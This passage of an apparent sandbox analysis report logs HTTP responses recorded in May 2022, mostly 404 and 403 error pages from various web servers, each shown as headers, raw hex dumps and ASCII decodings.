63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 42 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 42 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 42 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 68 65 62 65 73 74 76 69 64 66 6f 72 61 6c 6c 2e 78 79 7a 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8x-litespeed-tag: 440_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 27 May 2022 15:28:02 GMTserver: LiteSpeedData Raw: 32 66 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 b6 92 e8 67 bb ea fc 07 0c 5d 19 4b 09 49 91 d4 9b b2 9c 3d 99 3c 36 5b c9 9e 54 26 d9 5b b7 92 d4 14 44 42 12 67 28 92 87 84 2c 39 8e ef 6f bf d5 78 f0 25 50 2f 8f 93 d4 ce 24 95 58 24 81 ee 46 a3 d1 dd 00 1a 8d 9b 17 5f fe eb d5 4f ff f7 87 af d0 92 ae c2 db cb 1b f8 83 42 1c 2d a6 1a 89 8c 9f 5f 6b f0 8e 60 ff f6 f2 e2 66 45 28 46 de 12 a7 19 a1 53 ed e7 9f be 36 46 1a ea e4 5f 22 bc 22 53 ed 2e 20 9b 24 4e a9 86 bc 38 a2 24 a2 53 6d 13 f8 74 39 f5 c9 5d e0 11 83 3d e8 28 88 02 1a e0 d0 c8 3c 1c 92 a9 cd e0 70 04 0c cc 75 1a cf 62 9a 5d e7 40 ae 57 78 6b 04 2b bc 20 46 92 12 40 e2 86 38 5d 90 6b 20 e0 86 06 34 24 b7 3f e0 05 41 51 4c d1 3c 5e 47 3e 7a 79 35 72 6c 7b 82 be bf 47 5f 84 f1 e2 a6 c3 4b 5d de 84 41 f4 0e a5 24 9c 5e fb 51 06 e0 e6 84 7a cb 6b b4 4c c9 7c 7a dd e9 d0 25 99 91 8c de 05 fe 3c 4e 71 18 9a db fb df 39 9e 43 35 33 73 63 c6 e9 a2 56 58 c3 21 25 69 84 29 d1 10 bd 4f c8 54 c3 49 12 06 1e a6 41 1c 75 d2 2c fb 6c bb 0a 35 c4 c8 9b 6a 82 5c f4 32 c5 ff 5e c7 13 f4 35 21 be c6 69 d3 96 94 26 ae 9a c0 ce 9c 10 bf c3 f9 98 93 f9 34 cc af e2 d5 8a 44 34 3b 9a 04 4f 54 28 d3 92 79 69 90 d0 db cb 4d 10 f9 f1 c6 7c b3 49 c8 2a 7e 1b bc 26 94 06 d1 22 43 53 f4 a0 cd 70 46 7e 4e 43 cd 65 0d cc dc 5f 3b bf 76 04 2b 7f ed b0 4e cf 7e ed 78 71 4a 7e ed b0 ca bf 76 ec 9e 69 99 d6 af 9d a1 b3 1d 3a bf 76 34 5d 23 5b aa b9 9a 99 44 0b 4d d7 b2 bb c5 79 f0 b2 bb 05 83 96 dd 2d be e2 00 b3 3b 06 30 5e a7 1e d1 dc 07 cd 8b 23 0f 53 46 86 a0 97 91 ab 92 99 5f 3b 9b c4 08 22 2f 5c fb 24 fb b5 f3 36 63 2f 58 55 23 25 21 c1 19 31 57 41 64 be cd 3e bf 23 e9 74 60 5a da e3 e3 e4 b2 f3 e9 0b f4 d3 32 c8 d0 3c 08 09 0a 32 84 d7 34 36 16 24 22 29 a6 c4 47 9f 76 2e 5f cc d7 91 07 d2 d3 22 3a d6 69 fb e1 0e a7 28 d2 53 3d d6 83 29 36 bd 94 60 4a be 0a 09 74 5f 4b f3 70 74 87 33 ad ad 27 d3 c0 5c 10 fa 0a 06 e6 96 be 7c 59 7e 6a 69 8e af b5 27 12 30 ca 5a 44 02 c6 d3 d7 34 0d a2 85 39 4f e3 d5 ab 25 4e 5f c5 3e d1 c9 b4 95 98 5e 48 70 fa 23 f1 68 cb d2 2d 3d 30 f9 e8 0e cc 25 09 16 4b da d6 13 73 1e 84 e1 4f 64 4b 5b d8 04 a9 bf 6f d1 65 90 e9 a4 ad 5b ba d5 d6 03 93 c6 5f 62 8a 7f fe f1 bb 56 bb 3d 49 09 5d a7 11 3a 1f 2e 15 70 c9 74 3a ad c0 7e cc 1b e6 b5 08 e7 17 dd e5 14 17 56 ad 3d a1 66 96 7a 53 a2 53 d3 27 73 92 4e a9 c9 07 2e f0 ad f3 16 df 61 51 52 c7 c0 50 c1 e9 ec 8b fb 9f f0 e2 bf f1 8a b4 34 d0 99 5a fb 17 eb 37 68 35 89 fc 57 cb 20 f4 5b b4 fd 38 8f d3 56 3c fd 67 9a e2 fb 96 36 0f 31 48 17 97 a6 b6 4e cd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 15:28:06 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-05-27T15:28:11.6850751Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 15:28:06 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-05-27T15:28:11.7635228Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 15:28:06 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 8X-Rate-Limit-Reset: 2022-05-27T15:28:11.6850751Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:12 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:28:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:28:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:28:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dWpu5jLHo3iwl%2BNHIxtOk6Gl3dlqRVGQK7IouOJIj49gbhGQ5GxsGHxI%2FVyVDWR29kgWy2teu0x56i%2FsyEVNujcDhylznP4VgqJSjBbXUXMW7RroHOiuzTy%2Bh020xx09"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 711fc87d28084065-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 33 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 131<!doctype html><html><head><meta http-equiv="refresh" content="0;url=/" /><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title></title></head><body></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:28:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aYDNIrgnAgJHsp2BkArxa%2Fbw9L2rr8Y39iryxmsUNM9Wa0RihaqgBH9WjIx02N7auwbJtC68CY8ug7xM4ZGWRwwt1Aj3bMqa5EQh4Vu%2B%2BsVzL%2FCvIPje7MgZei4NJOfS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 711fc87cf80d0686-LHRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 90 cd 4e c3 30 10 84 ef 79 0a d7 e7 5a 81 1b 12 76 a4 0a 71 e0 01 90 b8 3a f6 14 af e4 9f e0 ac 53 fa f6 55 53 02 3d 70 1a 7d ab d9 59 cd ea 9d 2f 8e cf 13 44 e0 14 87 4e 6f 02 eb 87 4e 27 b0 15 81 79 52 f8 6a b4 18 59 71 ac 98 83 14 ae 64 46 66 23 1f 9e 5b 8d a6 97 a2 df fc 2e d8 3a 83 8d 6c 7c 54 4f f2 bf 98 0f f5 7e 50 2f 25 4d 96 69 8c b8 8b 7b 7b 35 f0 9f f8 dd ca 36 c1 c8 85 70 9a 4a e5 3b e3 89 3c 07 e3 b1 90 83 5a 61 2f 28 13 93 8d 6a 76 36 c2 3c ee 45 b2 df 94 5a fa 1b b4 19 75 25 3b 46 98 5c ae 77 98 38 62 d0 fd 4d 3b dd ff 94 1f 8b 3f 5f 71 d3 f5 35 17 00 00 00 ff ff 03 00 0b 21 95 2b 31 01 00 00 0d 0a Data Ascii: d8lN0yZvq:SUS=p}Y/DNoN'yRjYqdFf#[.:l|TO~P/%Mi{{56pJ;<Za/(jv6<EZu%;F\w8bM;?_q5!+1
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 May 2022 15:29:06 GMTContent-Type: text/htmlContent-Length: 291ETag: "628d16df-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:29:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:29:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 May 2022 15:29:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:29:48 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
